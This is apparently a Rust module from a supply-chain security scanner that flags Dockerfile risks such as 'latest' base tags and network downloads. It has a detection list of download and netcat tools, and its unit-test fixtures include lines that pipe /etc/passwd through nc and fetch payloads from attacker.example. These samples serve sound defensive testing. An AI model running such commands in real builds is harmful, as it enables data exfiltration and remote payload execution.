use crate::artifact_graph::{ArtifactCapability, ArtifactCapabilityFact, ArtifactRelation};
use crate::findings::{
ArtifactKind, EvidenceKind, Finding, MatchTarget, RecommendedAction, Severity, ThreatCategory,
};
use crate::services::artifact_orchestration::{ArtifactLink, ArtifactOrchestratorService};
use std::path::Path;
use crate::services::artifact_orchestration::manifests::strip_inline_hash_comment;
const DOCKERFILE_NETWORK_DOWNLOAD_TOKENS: &[&str] = &[
"curl",
"wget",
"invoke-webrequest",
"ncat",
" nc",
"fetch",
"python -m urllib",
"python -m http",
"python -c \"import urllib",
"python -c 'import urllib",
"perl -mlwp",
];
pub(crate) fn analyze_dockerfile(path: &Path, content: &str) -> Vec<Finding> {
let artifact_path = path.display().to_string();
let mut findings = Vec::new();
for line in content.lines().map(str::trim) {
let lower_line = line.to_ascii_lowercase();
if lower_line.starts_with("from ") && is_latest_tag(&lower_line) {
findings.push(
Finding::builder("MANIFEST_DOCKER_LATEST_TAG", ThreatCategory::SupplyChain)
.severity(Severity::Low)
.action(RecommendedAction::RequireApproval)
.evidence_kind(EvidenceKind::Context)
.matched_on(MatchTarget::ReferencedFile {
path: artifact_path.clone(),
})
.artifact(ArtifactKind::PackageManifest, Some(artifact_path.clone()))
.match_value(line)
.reason("Docker base image uses the mutable latest tag")
.build(),
);
}
}
findings
}
pub(crate) fn dockerfile_capabilities(content: &str) -> Vec<ArtifactCapabilityFact> {
let mut has_expose = false;
let mut has_run = false;
let mut has_copy_or_add = false;
let mut has_network_download = false;
for line in content.lines() {
let code = strip_inline_hash_comment(line.trim_start());
let trimmed = code.to_ascii_lowercase();
if !has_expose && (trimmed.starts_with("expose ") || trimmed.trim_end() == "expose") {
has_expose = true;
}
if !has_run && trimmed.starts_with("run ") {
has_run = true;
}
if !has_copy_or_add && (trimmed.starts_with("copy ") || trimmed.starts_with("add ")) {
has_copy_or_add = true;
}
if !has_network_download
&& DOCKERFILE_NETWORK_DOWNLOAD_TOKENS
.iter()
.any(|t| token_with_boundary(&trimmed, t))
{
has_network_download = true;
}
if !has_network_download
&& trimmed.starts_with("add ")
&& (trimmed.contains("http://") || trimmed.contains("https://"))
{
has_network_download = true;
}
}
let mut capabilities = Vec::new();
if has_expose {
capabilities.push(ArtifactOrchestratorService::declared_capability(
ArtifactCapability::NetworkAccess,
));
}
if has_network_download {
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::NetworkAccess,
));
}
if has_run {
capabilities.push(ArtifactOrchestratorService::declared_capability(
ArtifactCapability::ProcessExecution,
));
}
if has_copy_or_add {
capabilities.push(ArtifactOrchestratorService::declared_capability(
ArtifactCapability::FilesystemWrite,
));
}
capabilities
}
pub(crate) fn dockerfile_relations(content: &str) -> Vec<ArtifactLink> {
let mut links = Vec::new();
for line in content.lines().map(str::trim) {
let code = strip_inline_hash_comment(line);
let lower = code.to_ascii_lowercase();
if lower.starts_with("from ") {
links.push(ArtifactLink {
target: code[5..].trim().to_string(),
relation: ArtifactRelation::Loads,
});
}
if DOCKERFILE_NETWORK_DOWNLOAD_TOKENS
.iter()
.any(|t| token_with_boundary(&lower, t))
{
links.push(ArtifactLink {
target: "remote-resource".to_string(),
relation: ArtifactRelation::Downloads,
});
}
}
links
}
fn is_latest_tag(lower_line: &str) -> bool {
lower_line.contains(":latest")
&& lower_line.split(":latest").any(|after| {
after.is_empty()
|| after.starts_with(' ')
|| after.starts_with('\t')
|| after.starts_with('#')
|| after.starts_with('\n')
})
}
fn token_with_boundary(lower_line: &str, token: &str) -> bool {
let mut start = 0;
while let Some(pos) = lower_line[start..].find(token) {
let abs_pos = start + pos;
let token_end = abs_pos + token.len();
let before = if abs_pos > 0 {
lower_line.as_bytes().get(abs_pos - 1)
} else {
None
};
let left_ok = token.starts_with(' ')
|| before.is_none()
|| matches!(
before,
Some(b' ') | Some(b'\t') | Some(b'|') | Some(b';') | Some(b'&')
);
let after = lower_line.get(token_end..).unwrap_or("");
let right_ok = after.is_empty()
|| after.starts_with(' ')
|| after.starts_with('\t')
|| after.starts_with('|')
|| after.starts_with(';')
|| after.starts_with('&')
|| after.starts_with('>')
|| after.starts_with('.')
|| after.starts_with(':');
if left_ok && right_ok {
return true;
}
start = token_end;
}
false
}
#[cfg(test)]
mod tests {
use super::*;
fn capability_present(caps: &[ArtifactCapabilityFact], target: ArtifactCapability) -> bool {
caps.iter().any(|fact| fact.capability == target)
}
#[test]
fn dockerfile_capabilities_skips_curl_in_inline_comment() {
let content = "FROM alpine:3\nRUN echo ok # was: curl https://old\n";
let caps = dockerfile_capabilities(content);
assert!(!capability_present(
&caps,
ArtifactCapability::NetworkAccess
));
}
#[test]
fn dockerfile_capabilities_detects_real_curl_with_trailing_comment() {
let content = "FROM alpine:3\nRUN curl https://x # bootstrap\n";
let caps = dockerfile_capabilities(content);
assert!(capability_present(&caps, ArtifactCapability::NetworkAccess));
}
#[test]
fn dockerfile_relations_skips_curl_in_inline_comment() {
let content = "FROM alpine:3\nRUN echo ok # was: curl https://gone\n";
let links = dockerfile_relations(content);
assert!(
links.iter().all(|l| l.target != "remote-resource"),
"no Downloads link should be created from an inline-comment curl; got {links:?}",
);
}
#[test]
fn dockerfile_relations_detects_real_curl_with_trailing_comment() {
let content = "FROM alpine:3\nRUN curl https://x # bootstrap\n";
let links = dockerfile_relations(content);
assert!(
links.iter().any(|l| l.target == "remote-resource"),
"real curl invocation should produce a Downloads link; got {links:?}",
);
}
#[test]
fn dockerfile_capabilities_detects_python_urllib_download() {
let content = "FROM python:3.11-slim\nRUN python -m urllib.request https://x/payload\n";
let caps = dockerfile_capabilities(content);
let has_observed_network = caps.iter().any(|fact| {
fact.capability == ArtifactCapability::NetworkAccess
&& fact.source == crate::artifact_graph::ArtifactCapabilitySource::Observed
});
assert!(
has_observed_network,
"python -m urllib must flip observed NetworkAccess; got {caps:?}",
);
}
#[test]
fn dockerfile_capabilities_detects_fetch_and_netcat() {
let fetch = "FROM alpine\nRUN fetch -o /tmp/x https://internal/payload\n";
let nc = "FROM alpine\nRUN nc -lvp 4444 > /tmp/x\n";
for content in [fetch, nc] {
let caps = dockerfile_capabilities(content);
assert!(
caps.iter().any(|fact| {
fact.capability == ArtifactCapability::NetworkAccess
&& fact.source == crate::artifact_graph::ArtifactCapabilitySource::Observed
}),
"expected observed NetworkAccess for {content:?}; got {caps:?}",
);
}
}
#[test]
fn dockerfile_capabilities_does_not_overmatch_substrings_of_nc() {
let content = "FROM alpine\nRUN apk add func unc vncserver\n";
let caps = dockerfile_capabilities(content);
let has_observed_network = caps.iter().any(|fact| {
fact.capability == ArtifactCapability::NetworkAccess
&& fact.source == crate::artifact_graph::ArtifactCapabilitySource::Observed
});
assert!(
!has_observed_network,
"substrings like func/unc/vncserver must not trip observed NetworkAccess; got {caps:?}",
);
}
#[test]
fn dockerfile_relations_records_download_edge_for_python_urllib() {
let content = "FROM alpine\nRUN python -m urllib https://attacker.example/x.py\n";
let links = dockerfile_relations(content);
assert!(
links
.iter()
.any(|l| matches!(l.relation, ArtifactRelation::Downloads)
&& l.target == "remote-resource"),
"python -m urllib must produce a Downloads edge; got {links:?}",
);
}
#[test]
fn dockerfile_relations_records_download_edge_for_alternate_tools() {
for token in [
"RUN nc -lvp 4444 < /etc/passwd\n",
"RUN ncat attacker.example 4444\n",
"RUN fetch https://attacker.example/x\n",
"RUN perl -MLWP::Simple -e 'getstore(...)'\n",
] {
let content = format!("FROM alpine\n{token}");
let links = dockerfile_relations(&content);
assert!(
links
.iter()
.any(|l| matches!(l.relation, ArtifactRelation::Downloads)),
"token line `{token}` must produce a Downloads edge; got {links:?}",
);
}
}
#[test]
fn dockerfile_relations_still_records_curl_and_wget() {
for token in ["RUN curl https://x\n", "RUN wget https://x\n"] {
let content = format!("FROM alpine\n{token}");
let links = dockerfile_relations(&content);
assert!(
links
.iter()
.any(|l| matches!(l.relation, ArtifactRelation::Downloads)),
"`{token}` must keep producing a Downloads edge; got {links:?}",
);
}
}
#[test]
fn dockerfile_relations_does_not_overmatch_substrings() {
for line in ["RUN prefetch npm package", "RUN apk add func unc vncserver"] {
let content = format!("FROM alpine\n{line}\n");
let links = dockerfile_relations(&content);
assert!(
!links
.iter()
.any(|l| matches!(l.relation, ArtifactRelation::Downloads)),
"substring in `{line}` must not produce a Downloads edge; got {links:?}",
);
}
}
}